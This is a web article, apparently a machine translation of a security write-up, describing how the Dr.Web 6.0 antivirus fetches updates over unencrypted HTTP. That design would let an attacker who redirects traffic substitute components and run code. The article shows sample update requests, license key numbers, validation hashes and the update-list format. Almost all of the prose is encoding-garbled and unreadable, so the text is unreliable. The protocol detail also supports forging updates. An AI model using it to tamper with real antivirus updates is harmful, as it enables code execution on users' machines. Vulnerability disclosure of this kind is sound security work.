Clever Geek Handbook

DrWeb рдЕрджреНрдпрддрди рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдореЗрдВ рднреЗрджреНрдпрддрд╛ рдХреЛ рдЙрдЬрд╛рдЧрд░ рдХрд░рдирд╛

рдЗрд╕ рд▓реЗрдЦ рдореЗрдВ рдореИрдВ Dr.Web рдПрдВрдЯреА-рд╡рд╛рдпрд░рд╕ рдореЗрдВ рдЕрдкрдбреЗрдЯ рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХреА рд╕рдорд╕реНрдпрд╛рдУрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рд╡рд┐рд╕реНрддрд╛рд░ рд╕реЗ рдмрд╛рдд рдХрд░рдирд╛ рдЪрд╛рд╣рддрд╛ рд╣реВрдВ, рдЬрд┐рд╕рдХреЗ рд▓рд┐рдП, рдпрд╛рддрд╛рдпрд╛рдд рдЕрд╡рд░реЛрдзрди рдХреЗ рдорд╛рдорд▓реЗ рдореЗрдВ, рдПрдВрдЯреА-рд╡рд╛рдпрд░рд╕ рдШрдЯрдХреЛрдВ рдХреЛ рдкреНрд░рддрд┐рд╕реНрдерд╛рдкрд┐рдд рдХрд░рдирд╛ рдФрд░ рдордирдорд╛рдирд╛ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдирд╛ рд╕рдВрднрд╡ рд╣реЛ рдЬрд╛рддрд╛ рд╣реИред рдореИрдВрдиреЗ рдкрд╣рд▓реА рдмрд╛рд░ рдмреНрд░реЗрдХрд┐рдВрдЧ рдПрдВрдЯреАрд╡рд╛рдпрд░рд╕ рд╕реЙрдлрд╝реНрдЯрд╡реЗрдпрд░ (рдЬреЛрдХреНрд╕рд┐рдпрди рдХреЛрд░реЗрдЯ) рдХреА рдкреНрд░рд╕реНрддреБрддрд┐ рдореЗрдВ SyScan2014 рд╕рдореНрдореЗрд▓рди рдХреА рд╕рд╛рдордЧреНрд░рд┐рдпреЛрдВ рдореЗрдВ рднреЗрджреНрдпрддрд╛ рдЬрд╛рдирдХрд╛рд░реА рджреЗрдЦреА, рдФрд░ рддрдм рд╕реЗ рдЪреВрдВрдХрд┐ рднреЗрджреНрдпрддрд╛ рдкрд╣рд▓реЗ рд╕реЗ рд╣реА рдЬреНрдЮрд╛рдд рд╣реИ, рдЗрд╕рд▓рд┐рдП рдХрд┐рд╕реА рдЕрдиреНрдп рдкреНрд░рдХрд╛рд╢рди рдореЗрдВ рдмрд╣реБрдд рдЕрдзрд┐рдХ рд╕рдордЭрджрд╛рд░реА рдирд╣реАрдВ рдереАред рдХрдо рд╕реЗ рдХрдо рдПрдХ рдХреНрд╖рдг рддрдХред



рд▓реЗрдЦ рдХреА рдЪрд░реНрдЪрд╛ рдореЗрдВ " рд░реВрд╕реА рд░реЗрд▓рд╡реЗ рдХреЗ рднреБрдЧрддрд╛рди рдЧреЗрдЯрд╡реЗ рдкрд░ рд▓рдЧрднрдЧ 70,000 рдХрд╛рд░реНрдб рд╕реЗ рдбреЗрдЯрд╛ рд╕рдордЭреМрддрд╛ рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛", рдореИрдВ рдХреБрдЫ рдкрд╛рдардХреЛрдВ рдХреА рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рд╕реЗ рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ рдЖрд╢реНрдЪрд░реНрдпрдЪрдХрд┐рдд рдерд╛, рдФрд░ рд╕рдВрднрд╡рддрдГ рдбреЙред рд╡реЗрдм рдХреЗ рдХрд░реНрдордЪрд╛рд░рд┐рдпреЛрдВ рдореЗрдВ рд╕реЗ рдПрдХ рдерд╛, рдЬрд┐рдиреНрд╣реЛрдВрдиреЗ рд╕рдорд╕реНрдпрд╛рдУрдВ рдХреЛ рд╕реНрд╡реАрдХрд╛рд░ рдХрд░рдиреЗ рд╕реЗ рдЗрдирдХрд╛рд░ рдХрд░ рджрд┐рдпрд╛ рдерд╛ред рдЗрд╕рд▓рд┐рдП, рд╕реНрд╡рдпрдВ рд╡рд┐рд╡рд░рдгреЛрдВ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдиреЗ рдХрд╛ рдирд┐рд░реНрдгрдп рд▓рд┐рдпрд╛ рдЧрдпрд╛, рдФрд░ рдСрдкрд░реЗрд╢рди рдХреА рд╕рдВрднрд╛рд╡рдирд╛ рдХреА рднреА рдЬрд╛рдВрдЪ рдХреА рдЧрдИред рдореБрдЭреЗ рдЙрдореНрдореАрдж рд╣реИ рдХрд┐ рдпрд╣ рдкреНрд░рдХрд╛рд╢рди рд╕реНрдерд┐рддрд┐ рдХреЗ рд╢реБрд░реБрдЖрддреА рд╕реБрдзрд╛рд░ рдореЗрдВ рдпреЛрдЧрджрд╛рди рджреЗрдЧрд╛ред



рд╕реНрд░реЛрдд рдбреЗрдЯрд╛:


Dr.Web рд╕рдВрд╕реНрдХрд░рдг 6.0 рдХреЛ "рдкреНрд░рдпреЛрдЧрд╛рддреНрдордХ" рдХреЗ рд░реВрдк рдореЗрдВ рдЪреБрдирд╛ рдЧрдпрд╛ рдерд╛, рдХреНрдпреЛрдВрдХрд┐ рдЗрд╕рдореЗрдВ рдХрдИ рдкреНрд░рдорд╛рдг рдкрддреНрд░ рд╣реИрдВ: FSTEC, FSB рдФрд░ рд░реВрд╕реА рд╕рдВрдШ рдХреЗ рд░рдХреНрд╖рд╛ рдордВрддреНрд░рд╛рд▓рдпред рд╢реЗрд╖ рд╕рдВрд╕реНрдХрд░рдгреЛрдВ рдкрд░ рд╡рд┐рдЪрд╛рд░ рдирд╣реАрдВ рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛, рдЗрд╕рд▓рд┐рдП рд╢рд╛рдпрдж рдЙрдирдХреЗ рдкрд╛рд╕ рд╕рдорд╛рди рд╕рдорд╕реНрдпрд╛рдПрдВ рд╣реИрдВ, рд▓реЗрдХрд┐рди рд╢рд╛рдпрдж рдирд╣реАрдВред рдкреНрд░рдпреЛрдЧ рдХреЗ рджреМрд░рд╛рди, рд╕рднреА рдПрдВрдЯреАрд╡рд╛рдпрд░рд╕ рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рдбрд┐рдлрд╝реЙрд▓реНрдЯ рд░реВрдк рд╕реЗ рд╕реЗрдЯ рдХреА рдЧрдИрдВ, рдЕрдВрддрд░реНрдирд┐рд╣рд┐рдд рд╕реБрд░рдХреНрд╖рд╛ рдЕрдХреНрд╖рдо рдирд╣реАрдВ рдереАред рдСрдкрд░реЗрдЯрд┐рдВрдЧ рд╕рд┐рд╕реНрдЯрдо рд╡рд┐рдВрдбреЛрдЬ 7 рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реИред



рдкрд░реАрдХреНрд╖рдг рдХреЗ рд╕рдордп рдПрдВрдЯреАрд╡рд╛рдпрд░рд╕ рд╕реЙрдлрд╝реНрдЯрд╡реЗрдпрд░ рдореЙрдбреНрдпреВрд▓ рдФрд░ рдЙрдирдХреЗ рд╕рдВрд╕реНрдХрд░рдгреЛрдВ рдХреА рдПрдХ рд╡рд┐рд╕реНрддреГрдд рд╕реВрдЪреА
  • Dr.Web┬о рд╡рд╛рдпрд░рд╕-рдЦреЛрдЬ рдЗрдВрдЬрди drweb32.dll (7.00.9.04080)
  • Dr.Web┬о рд╕реНрдХреИрдирд┐рдВрдЧ рдЗрдВрдЬрди dwengine.exe (7.0.1.05020 (рдмрд┐рд▓реНрдб 9393))
  • Dr.Web┬о рд╡рд┐рдВрдбреЛрдЬ рдПрдХреНрд╢рди рд╕реЗрдВрдЯрд░ рдПрдХреАрдХрд░рдг dwsewsc.exe (7.0.1.05020 (рдмрд┐рд▓реНрдб 9393))
  • Dr.Web рдлрд╝рд╛рдЗрд▓ рд╕рд┐рд╕реНрдЯрдо рдореЙрдирд┐рдЯрд░ spiderg3.sys (6.0.10.12290)
  • Dr.Web рд╡рд┐рдВрдбреЛрдЬ рдХреЗ рд▓рд┐рдП рд╕рдВрд░рдХреНрд╖рдг dwprot.sys (7.0.0.08090)
  • Windows spideragent.exe рдХреЗ рд▓рд┐рдП рд╕реНрдкрд╛рдЗрдбрд░ рдПрдЬреЗрдВрдЯ (6.0.5.10310)
  • рд╕реНрдкрд╛рдЗрдбрд░ рдПрдЬреЗрдВрдЯ рдПрдбрдорд┐рди-рдореЛрдб рдореЙрдбреНрдпреВрд▓ рдХреЗ рд▓рд┐рдП Windows spideragent_adm.exe (6.0.5.10310)
  • Windows рд╕реНрдкрд╛рдЗрдбрд░реИрдЧреЗрдВрдЯ_рд╕реЗрдЯ ..exe (6.0.5.10310) рдХреЗ рд▓рд┐рдП рд╕реНрдкрд╛рдЗрдбрд░ рдПрдЬреЗрдВрдЯ рд╕реЗрдЯрд┐рдВрдЧ рдореЙрдбреНрдпреВрд▓
  • рд╡рд┐рдВрдбреЛрдЬ рд╡рд░реНрдХрд╕реНрдЯреЗрд╢рди spiderml.exe рдХреЗ рд▓рд┐рдП рд╕реНрдкрд╛рдЗрдбрд░ рдореЗрд▓ ┬о (6.0.3.08040)
  • Windows рд╡рд░реНрдХрд╕реНрдЯреЗрд╢рди рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рдореЙрдбреНрдпреВрд▓ spml_set.exe (6.0.3.08040) рдХреЗ рд▓рд┐рдП рд╕реНрдкрд╛рдЗрдбрд░ рдореЗрд▓┬о
  • Dr.Web Winsock рдкреНрд░рджрд╛рддрд╛ рд╣реБрдХ drwebsp.dll (6.0.1.04140)
  • Dr.Web Winsock рдкреНрд░рджрд╛рддрд╛ рд╣реБрдХ drwebsp64.dll (6.0.1.04140)
  • Dr.Web ┬й рд╡рд┐рдВрдбреЛрдЬ drweb32w.exe (6.00.16.01270) рдХреЗ рд▓рд┐рдП рд╕реНрдХреИрдирд░
  • Dr.Web┬о рдХрдВрд╕реЛрд▓ рд╕реНрдХреИрдирд░ dwscancl.exe (7.0.1.05020 (рдмрд┐рд▓реНрдб 9393))
  • Dr.Web┬о рд╢реЗрд▓ рдПрдХреНрд╕рдЯреЗрдВрд╢рди drwsxtn.dll (6.00.1.201103100)
  • Dr.Web┬о рд╢реЗрд▓ рдПрдХреНрд╕рдЯреЗрдВрд╢рди drwsxtn64.dll (6.00.1.201103100)
  • Dr.Web рд╡рд┐рдВрдбреЛрдЬ рдХреЗ рд▓рд┐рдП рдЕрдкрдбреЗрдЯрд░ drwebupw.exe (6.00.15.201301210)
  • Dr.Web рд╣реЗрд▓реНрдкрд░ drwreg.exe (6.00.12.201102110)
  • Dr.Web SysInfo dwsysinfo.exe (7.00.3.201204270)
  • DrWeb┬о рд╕рдВрдЧрд░реЛрдз рдкреНрд░рдмрдВрдзрдХ dwqrui.exe (7.0.1.05020 (рдмрд┐рд▓реНрдб 9393))
  • Dr.Web рдЬреЛрдбрд╝рддрд╛-рдЕрдирдкреИрдХрд░ drwadins.exe рдкрд░ (6.00.0.02270)
  • Microsoft Outlook рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рдХреЗ рд▓рд┐рдП Dr.Web┬о drwebsettingprocess.exe (6.00.0.201101130)
  • Microsoft Outlook рд╕рдВрджреЗрд╢ drwmsg.dll (6.00.0.201101130) рдХреЗ рд▓рд┐рдП Dr.Web┬о
  • Microsoft Outlook drwebforoutlook.dll (6.00.0.201101130) рдХреЗ рд▓рд┐рдП Dr.Web┬о






рднреЗрджреНрдпрддрд╛ рдХрд╛ рдлрд╛рдпрджрд╛ рдЙрдард╛рдиреЗ рдХреЗ рд▓рд┐рдП, рд╣рдорд▓рд╛рд╡рд░ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЯреНрд░реИрдлрд╝рд┐рдХ рдХреЛ рдкреБрдирд░реНрдирд┐рд░реНрджреЗрд╢рд┐рдд рдХрд░рдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рд╣реЛрдирд╛ рдЖрд╡рд╢реНрдпрдХ рд╣реИ (рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, DNS рд╕рд░реНрд╡рд░ рд╕реНрдкреВрдлрд┐рдВрдЧ, ARP рдХреИрд╢ рд╡рд┐рд╖рд╛рдХреНрддрддрд╛, рдпрд╛ рдХреБрдЫ рдФрд░ рдХреЗ рдХрд╛рд░рдг)ред рдкреНрд░рдпреЛрдЧ рдХреА рд╕рд╛рджрдЧреА рдХреЗ рд▓рд┐рдП, рдПрдХ рдкрд░реАрдХреНрд╖рдг рд╡рд╛рддрд╛рд╡рд░рдг рдореЗрдВ, рдХреНрд▓рд╛рдЗрдВрдЯ рдФрд░ рд╣рдорд▓рд╛рд╡рд░ рдХрдВрдкреНрдпреВрдЯрд░ рдПрдХ рд╣реА рдиреЗрдЯрд╡рд░реНрдХ рдкрд░ рд╣реИрдВ:









рднреЗрджреНрдпрддрд╛ рд╡рд┐рд╡рд░рдг


рдЕрдкрдиреЗ рд╕рд░реНрд╡рд░ рд╕реЗ рдЕрдкрдбреЗрдЯ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, Dr.Web http рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реИ, рдЕрд░реНрдерд╛рддред рдбреЗрдЯрд╛ рд╕реНрдкрд╖реНрдЯ рдкрд╛рда рдореЗрдВ рдкреНрд░рд╕рд╛рд░рд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред

рдЕрджреНрдпрддрди рд╕рд░реНрд╡рд░ рдХреА рд╕реВрдЪреА
  • update.geo.drweb.com
  • update.drweb.com
  • update.msk.drweb.com
  • update.us.drweb.com
  • update.msk5.drweb.com
  • update.msk6.drweb.com
  • update.fr1.drweb.com
  • update.us1.drweb.com
  • update.kz.drweb.com
  • update.nsk1.drweb.com




рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдЕрдиреБрдХреНрд░рдо рдореЗрдВ рдХреА рдЬрд╛рддреА рд╣реИ:

  1. рдЯрд╛рдЗрдорд╕реНрдЯреИрдореНрдк рдЕрдиреБрд░реЛрдз - рдЯрд╛рдЗрдорд╕реНрдЯреИрдореНрдк

    рдЕрдиреБрд░реЛрдз рдЙрджрд╛рд╣рд░рдг
    GET / x64 / 600 / av / рд╡рд┐рдВрдбреЛрдЬрд╝ / рдЯрд╛рдЗрдорд╕реНрдЯреИрдореНрдк

    HTTP / 1.1 рд╕реНрд╡реАрдХрд╛рд░ рдХрд░реЗрдВ: * / *

    рд╣реЛрд╕реНрдЯ: update.drweb.com

    X-DrWeb-Validate: 259e9b92fa099939d198dbd82c106f95

    X-DrWeb-KeyNumber: 0110258647

    X-DrWeb-SysHash: E2E8203CB505AE00939EEC9C1D58D0E4

    рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛-рдПрдЬреЗрдВрдЯ: DrWebUpdate-6.00.15.06220 (рд╡рд┐рдВрдбреЛрдЬрд╝: 6.01.7601)

    рдХрдиреЗрдХреНрд╢рди: рдХреАрдк-рдЕрд▓рд╛рдЗрд╡

    рдХреИрд╢-рдХрдВрдЯреНрд░реЛрд▓: рдиреЛ-рдХреИрд╢



    HTTP / 1.1 200 рдареАрдХ рд╣реИ

    рд╕рд░реНрд╡рд░: nginx / 42 рджрд┐рдирд╛рдВрдХ: рд╢рдирд┐, 19 рдЕрдкреНрд░реИрд▓ 2014 10:33:36 GMT

    рд╕рд╛рдордЧреНрд░реА-рдкреНрд░рдХрд╛рд░: рдЖрд╡реЗрджрди / рдУрдХрдЯреЗрдЯ-рдзрд╛рд░рд╛

    рд╕рд╛рдордЧреНрд░реА-рд▓рдВрдмрд╛рдИ: 10

    рдЕрдВрддрд┐рдо-рд╕рдВрд╢реЛрдзрд┐рдд: Sat, 19 рдЕрдкреНрд░реИрд▓ 2014 09:26:19 GMT

    рдХрдиреЗрдХреНрд╢рди: рдЬреАрд╡рд┐рдд рд░рдЦреЗрдВ

    рд╕реНрд╡реАрдХрд╛рд░-рд░рдВрдЧ: рдмрд╛рдЗрдЯреНрд╕



    1397898695



  2. рдЕрддрд┐рд░рд┐рдХреНрдд рдЬрд╛рдирдХрд╛рд░реА рдХрд╛ рдЕрдиреБрд░реЛрдз (рдПрдВрдЯреАрд╡рд╛рдпрд░рд╕ рдФрд░ рдХреБрдЫ рдЕрдиреНрдп рдбреЗрдЯрд╛ рдХрд╛ рд╡рд░реНрддрдорд╛рди рд╕рдВрд╕реНрдХрд░рдг) - drweb32.flg рдлрд╝рд╛рдЗрд▓

    рдЕрдиреБрд░реЛрдз рдЙрджрд╛рд╣рд░рдг
    GET /x64/600/av/windows/drweb32.flg HTTP / 1.1

    рд╕реНрд╡реАрдХрд╛рд░ рдХрд░реЗрдВ: * / *

    рд╣реЛрд╕реНрдЯ: update.drweb.com

    X-DrWeb-Validate: 259e9b92fa099939d198dbd82c106f95

    X-DrWeb-KeyNumber: 0110258647

    X-DrWeb-SysHash: E2E8203CB505AE00939EEC9C1D58D0E4

    рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛-рдПрдЬреЗрдВрдЯ: DrWebUpdate-6.00.15.06220 (рд╡рд┐рдВрдбреЛрдЬрд╝: 6.01.7601)

    рдХрдиреЗрдХреНрд╢рди: рдХреАрдк-рдЕрд▓рд╛рдЗрд╡

    рдХреИрд╢-рдХрдВрдЯреНрд░реЛрд▓: рдиреЛ-рдХреИрд╢



    HTTP / 1.1 200 рдареАрдХ рд╣реИ

    рд╕рд░реНрд╡рд░: nginx / 42 рджрд┐рдирд╛рдВрдХ: рд╢рдирд┐, 19 рдЕрдкреНрд░реИрд▓ 2014 10:33:37 GMT

    рд╕рд╛рдордЧреНрд░реА-рдкреНрд░рдХрд╛рд░: рдЖрд╡реЗрджрди / рдУрдХрдЯреЗрдЯ-рдзрд╛рд░рд╛

    рд╕рд╛рдордЧреНрд░реА-рд▓рдВрдмрд╛рдИ: 336 рдЕрдВрддрд┐рдо-рд╕рдВрд╢реЛрдзрд┐рдд: рдмреБрдз, 23 рдЬрдирд╡рд░реА 2013 09:42:21 GMT

    рдХрдиреЗрдХреНрд╢рди: рдЬреАрд╡рд┐рдд рд░рдЦреЗрдВ

    рд╕реНрд╡реАрдХрд╛рд░-рд░рдВрдЧ: рдмрд╛рдЗрдЯреНрд╕ [рд╡рд┐рдВрдбреЛрдЬрд╝]



    LinkNews = http: //news.drweb.com/flag+800/

    LinkDownload = http: //download.geo.drweb.com/pub/drweb/windows/8.0/drweb-800-win.exe

    рдлрд╝рд╛рдЗрд▓рдирд╛рдо =

    isTime = рез

    TimeX = 1420122293

    cmdLine =

    рдЯрд╛рдЗрдк = 1

    рдмрд╣рд┐рд╖реНрдХреГрдд = 2k | xp64

    рдмрд╣рд┐рд╖реНрдХреГрдд рдХрд░рдирд╛ = рдЬрд╛

    рдмрд╣рд┐рд╖реНрдХреГрдд = 17 | 1041 |

    [рд╣рд╕реНрддрд╛рдХреНрд╖рд░]

    рд╣рд╕реНрддрд╛рдХреНрд╖рд░ = 7077D2333EA900BCF30E479818E53447CA388597B3AC20B7B0471225FDE69066E8AC4C291F364077



  3. рдЕрджреНрдпрддрди рд╕рд┐рд╕реНрдЯрдо рдШрдЯрдХреЛрдВ рдХреА рд╕реВрдЪреА рдХреЗ рд▓рд┐рдП рдЕрдиреБрд░реЛрдз рдХрд░реЗрдВ - drweb32.lst.lzma рдлрд╝рд╛рдЗрд▓

    рдЕрдиреБрд░реЛрдз рдЙрджрд╛рд╣рд░рдг
    GET /x64/600/av/windows/drweb32.lst.lzma HTTP / 1.1

    рд╕реНрд╡реАрдХрд╛рд░ рдХрд░реЗрдВ: * / *

    рд╣реЛрд╕реНрдЯ: update.drweb.com

    X-DrWeb-Validate: 259e9b92fa099939d198dbd82c106f95

    X-DrWeb-KeyNumber: 0110258647

    X-DrWeb-SysHash: E2E8203CB505AE00939EEC9C1D58D0E4

    рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛-рдПрдЬреЗрдВрдЯ: DrWebUpdate-6.00.15.06220 (рд╡рд┐рдВрдбреЛрдЬрд╝: 6.01.7601)

    рдХрдиреЗрдХреНрд╢рди: рдХреА-рдЕрд▓рд╛рдЗрд╡ рдХреИрд╢-рдХрдВрдЯреНрд░реЛрд▓: рдиреЛ-рдХреИрд╢



    HTTP / 1.1 200 рдареАрдХ рд╣реИ

    рд╕рд░реНрд╡рд░: nginx / 42

    рджрд┐рдирд╛рдВрдХ: рд╢рдирд┐, рез реп рдЕрдкреНрд░реИрд▓ реирежрезрек 10:33:39 GMT

    рд╕рд╛рдордЧреНрд░реА-рдкреНрд░рдХрд╛рд░: рдЖрд╡реЗрджрди / рдУрдХрдЯреЗрдЯ-рдзрд╛рд░рд╛

    рд╕рд╛рдордЧреНрд░реА-рд▓рдВрдмрд╛рдИ: 2373

    рдЕрдВрддрд┐рдо-рд╕рдВрд╢реЛрдзрд┐рдд: Sat, 19 рдЕрдкреНрд░реИрд▓ 2014 10:23:08 GMT

    рдХрдиреЗрдХреНрд╢рди: рдЬреАрд╡рд┐рдд рд░рдЦреЗрдВ

    рд╕реНрд╡реАрдХрд╛рд░-рд░рдВрдЧ: рдмрд╛рдЗрдЯреНрд╕



    ] ..... # .......-ред

    ..x.3..xред ред ** .. рд╕реА ....... рдбреАред ... рдПрдХреНрд╕ред 7..рд╡реАрдмреАред * рдкреА] рд╕реА ... <.... ^ред, 2.рд╕реАред ....? (, .. .. * ... sA.U.pM .., ....... hG .... jред * ............. F ...: ..! Z ..... h ..} ... (Y1k .....} ... F ..-.... J ........ ...ред ....... | ... 3ред; ..... 5 .. "... SK`)

    .Kjx $, .... u.5 .. ~ред} UX.E ... (рдЕрдиреНрдп рдбреЗрдЯрд╛ рдЫреЛрдбрд╝рд╛ рдЧрдпрд╛)



    рдЕрдиреБрд░реЛрдзрд┐рдд рдлрд╝рд╛рдЗрд▓ lzma рдПрд▓реНрдЧреЛрд░рд┐рдереНрдо (7-рдЬрд╝рд┐рдк рдореЗрдВ рдкреНрд░рдпреБрдХреНрдд) рджреНрд╡рд╛рд░рд╛ рд╕рдВрдкреАрдбрд╝рд┐рдд рдПрдХ рд╕рдВрдЧреНрд░рд╣ рд╣реИред рдЕрдирдкреИрдХ рдХрд░рдиреЗ рдХреЗ рдмрд╛рдж, рдлрд╝рд╛рдЗрд▓ рд╕реНрд╡рдпрдВ рдХреБрдЫ рдЗрд╕ рддрд░рд╣ рджрд┐рдЦрддреА рд╣реИ: 

    [DrWebUpdateList] [500] +timestamp, 8D17F12F +lang.lst, EDCB0715 +update.drl, AB6FA8BE +drwebupw.exe, 8C879982 +drweb32.dll, B73749FD +drwebase.vdb, C5CBA22F тАж +<wnt>%SYSDIR64%\drivers\dwprot.sys, 3143EB8D +<wnt>%CommonProgramFiles%\Doctor Web\Scanning Engine\dwengine.exe, 8097D92B +<wnt>%CommonProgramFiles%\Doctor Web\Scanning Engine\dwinctl.dll, A18AEA4A ... [DrWebUpdateListEnd]


    рдлрд╝рд╛рдЗрд▓ рдирд╛рдореЛрдВ рдХреЗ рдЖрдЧреЗ рд╣реЗрдХреНрд╕рд╛рдбреЗрд╕рд┐рдорд▓ рдорд╛рди crc32 рдПрд▓реНрдЧреЛрд░рд┐рдереНрдо рджреНрд╡рд╛рд░рд╛ рдЧрдгрдирд╛ рдХреА рдЧрдИ рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЗ рдЪреЗрдХрд╕рдо рд╣реИрдВред рдЗрд╕ рд╕реНрдерд┐рддрд┐ рдореЗрдВ, рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЗ "рд╕рдВрд╕реНрдХрд░рдг" рдХреЛ рдмрдирд╛рдП рд░рдЦрдиреЗ рдХреЗ рд▓рд┐рдП рдЪреЗрдХрд╕рдо рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред

    рдЖрдк рдпрд╣ рднреА рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВ рдХрд┐ рдЕрдкрдбреЗрдЯ рддрдВрддреНрд░ рдкрд░реНрдпрд╛рд╡рд░рдг рдЪрд░ рдЬреИрд╕реЗ% CommonProgramFiles%,% SYSDIR64%, рдЖрджрд┐ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддрд╛ рд╣реИред - рдпрд╛рдиреА рдлрд╝рд╛рдЗрд▓реЗрдВ рди рдХреЗрд╡рд▓ Dr.Web рдлрд╝реЛрд▓реНрдбрд░ рдореЗрдВ рдЕрдкрд▓реЛрдб рдХреА рдЬрд╛ рд╕рдХрддреА рд╣реИрдВ, рдмрд▓реНрдХрд┐ рдЕрдиреНрдп рд╕рд┐рд╕реНрдЯрдо рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛рдУрдВ рдореЗрдВ рднреА



  4. рдлрд╝рд╛рдЗрд▓реЗрдВ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░реЗрдВ

    рдЙрджрд╛рд╣рд░рдг рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░реЗрдВ
    GET / x86/600/av/windows/dwrtoday.vdb HTTP / 1.1

    рд╕реНрд╡реАрдХрд╛рд░ рдХрд░реЗрдВ: * / *

    рд╣реЛрд╕реНрдЯ: update.drweb.com

    X-DrWeb-Validate: 741d1186c47dc500ab5a60629579d8cf

    X-DrWeb-KeyNumber: 0110242389

    X-DrWeb-SysHash: 08AA5F775FD38D161E2221928D9090FF

    рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛-рдПрдЬреЗрдВрдЯ: DrWebUpdate-6.00.15.06220 (рд╡рд┐рдВрдбреЛрдЬрд╝: 6.01.7600)

    рдХрдиреЗрдХреНрд╢рди: рдХреАрдк-рдЕрд▓рд╛рдЗрд╡

    рдХреИрд╢-рдХрдВрдЯреНрд░реЛрд▓: рдиреЛ-рдХреИрд╢



    HTTP / 1.1 200 рдареАрдХ рд╣реИ

    рд╕рд░реНрд╡рд░: nginx / 42

    рджрд┐рдирд╛рдВрдХ: рд╢рдирд┐, 19 рдЕрдкреНрд░реИрд▓ 2014 02:02:36 GMT

    рд╕рд╛рдордЧреНрд░реА-рдкреНрд░рдХрд╛рд░: рдЖрд╡реЗрджрди / рдУрдХрдЯреЗрдЯ-рдзрд╛рд░рд╛

    рд╕рд╛рдордЧреНрд░реА-рд▓рдВрдмрд╛рдИ: 5712

    рдЕрдВрддрд┐рдо-рд╕рдВрд╢реЛрдзрд┐рдд: Sat, 19 рдЕрдкреНрд░реИрд▓ 2014 01:31:32 GMT

    рдХрдиреЗрдХреНрд╢рди: рдЬреАрд╡рд┐рдд рд░рдЦреЗрдВ

    рд╕реНрд╡реАрдХрд╛рд░-рд░рдВрдЧ: рдмрд╛рдЗрдЯреНрд╕



    Dr.Web┬о рд╕рдВрд╕реНрдХрд░рдг 4.20+ рдПрдВрдЯреА-рд╡рд╛рдпрд░рд╕ рдбреЗрдЯрд╛рдмреЗрд╕

    рдХреЙрдкреАрд░рд╛рдЗрдЯ ┬й рдЗрдЧреЛрд░ Daniloff рджреНрд╡рд╛рд░рд╛, 1998-2014

    рдбреЙрдХреНрдЯрд░ рд╡реЗрдм рдПрдВрдЯреА-рд╡рд╛рдпрд░рд╕ рд▓реИрдмреНрд╕, рд╕реЗрдВрдЯ рдкреАрдЯрд░реНрд╕рдмрд░реНрдЧ рджреНрд╡рд╛рд░рд╛ рдмрдирд╛рдпрд╛ рдЧрдпрд╛

    IDRW4 ... CR / .U .._ред C..9Gред ~ \ J .... 6G ....} u ... y $ _naykP ... x ......... .. рд╣ ... ................ рдЬреЗ ..... рдХреНрдпреВрдПрд╕ ................ other .. (рдЕрдиреНрдп рдбреЗрдЯрд╛ рдЫреЛрдбрд╝рд╛ рдЧрдпрд╛ )



    рдЗрд╕ рдШрдЯрдирд╛ рдореЗрдВ рдХрд┐ рдкреНрд░рд╛рдкреНрдд рдЕрджреНрдпрддрди рд╕реВрдЪреА рд╕реЗ рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЗ рдЪреЗрдХрд╕рдо рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдП рдЧрдП рд▓реЛрдЧреЛрдВ рд╕реЗ рднрд┐рдиреНрди рд╣реЛрддрд╛ рд╣реИ, рддреЛ рдЧреНрд░рд╛рд╣рдХ рдореМрдЬреВрджрд╛ рдПрдХ рдкреИрдЪ рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░рддрд╛ рд╣реИ: 

     GET /x64/600/av/windows/drwebupw.exe.patch_8c879982_fd933b5f


    рдпрджрд┐ рдкреИрдЪ рдкреНрд░рд╛рдкреНрдд рдирд╣реАрдВ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ рдпрд╛ рдлрд╝рд╛рдЗрд▓ рдкрд╣рд▓реЗ рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рдирд╣реАрдВ рдереА, рддреЛ рдкреВрд░реА рдирдИ рдлрд╝рд╛рдЗрд▓ рдХреЗ рд▓рд┐рдП рдПрдХ рдЕрдиреБрд░реЛрдз рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ: 

     GET /x64/600/av/windows/drwebupw.exe


